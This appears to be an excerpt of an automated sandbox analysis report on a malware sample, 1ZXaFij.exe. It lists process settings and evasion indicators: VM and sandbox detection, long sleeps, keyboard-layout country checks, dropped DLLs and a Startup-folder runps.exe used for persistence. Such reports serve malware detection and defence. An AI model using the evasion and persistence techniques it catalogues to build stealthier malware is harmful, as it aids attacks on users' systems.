        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Found API chain indicative of sandbox detection
        Source: C:\Users\user\Desktop\1ZXaFij.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_2-84940
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\explorer.exeCode function: 23_2_11F92FC0 rdtscp 23_2_11F92FC0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: SetTimer,GetTickCount,GetMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,GetFocus,GetClassNameW,GetTickCount,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetTickCount,PeekMessageW,Sleep,Sleep,GetTickCount,Sleep,GetClassLongW,GetWindowLongPtrW,GetWindowLongW,GetParent,TranslateAcceleratorW,GetDlgCtrlID,GetParent,GetKeyState,GetKeyState,GetDlgCtrlID,GetParent,SendMessageW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,PostMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetTickCount,KillTimer,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,KillTimer,2_2_000000014000172D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3242Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6379Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4222
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1181
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2473Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1206Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2464
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 515
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vk4yczyv.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.dllJump to dropped file
        Source: C:\Users\user\Desktop\1ZXaFij.exeAPI coverage: 2.6 %
        Source: C:\Users\user\Desktop\1ZXaFij.exe TID: 2440Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exe TID: 7180Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 3242 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 6379 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -16602069666338586s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe TID: 7412Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 4222 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 1181 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 2464 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 515 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1252Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004913B GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400492E5h country: Urdu (ur)2_2_000000014004913B
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004913B GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: jnbe 00000001400492E5h country: Inuktitut (iu)2_2_000000014004913B
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001D8D0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 000000014001DC40h country: Spanish (es)2_2_000000014001D8D0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140022EF0 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400230FCh country: Russian (ru)2_2_0000000140022EF0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140035270 GetLocalTime followed by cmp: cmp ax, 0009h and CTI: jne 0000000140035615h2_2_0000000140035270
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140035270 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 00000001400357D2h2_2_0000000140035270
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A24B0 FindFirstFileW,FindClose,FindFirstFileW,FindClose,2_2_00000001400A24B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400296C0 GetFileAttributesW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,2_2_00000001400296C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400709C0 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,2_2_00000001400709C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029170 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0000000140029170
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029520 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,2_2_0000000140029520
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140028E70 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,2_2_0000000140028E70
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A98B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bVMCiwzXsG
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QemUBE
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LhuFsbQEMuJy
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IvckUpVvQEMupTahhY
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A7C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmciQbuqHYlbstrNs
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HVvMcIwJ
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A98B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CYogXQEMUErDuxpV
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A98B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PDHGfScBbP
        Source: 1ZXaFij.exe, 00000002.00000003.1365261600.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1372869069.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000002.1375951384.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398945676.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397792204.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000002.1398553534.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397215330.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1398080911.0000000000A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 00000017.00000000.1511345993.000000000C4A2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: r&_VMware_SATA_CD00#4&224f42ef&0&0
        Source: runps.exe, 0000000C.00000002.1398945676.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1397215330.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, runps.exe, 0000000C.00000003.1398080911.0000000000A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Jvmcis
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: deyWQXoXAPRlFsz
        Source: explorer.exe, 00000017.00000002.1664331014.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgfsALVLGm
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: yerbuZvmcISIqzYvt
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A8605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEMUeoeSaiPCqZeyH
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A7C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fkvCnytFVMcIfHrGkc
        Source: 1ZXaFij.exe, 00000002.00000003.1373881049.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000002.1375884044.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, 1ZXaFij.exe, 00000002.00000003.1364834877.0000000000A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A7C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nfUGXmHxjYwRhgFsa
        Source: powershell.exe, 00000011.00000002.1485108514.00000203A9005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EEkhGFSe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\explorer.exeCode function: 23_2_11F92FC0 rdtscp 23_2_11F92FC0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001E05C GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetTickCount,2_2_000000014001E05C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D5288 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00000001400D5288
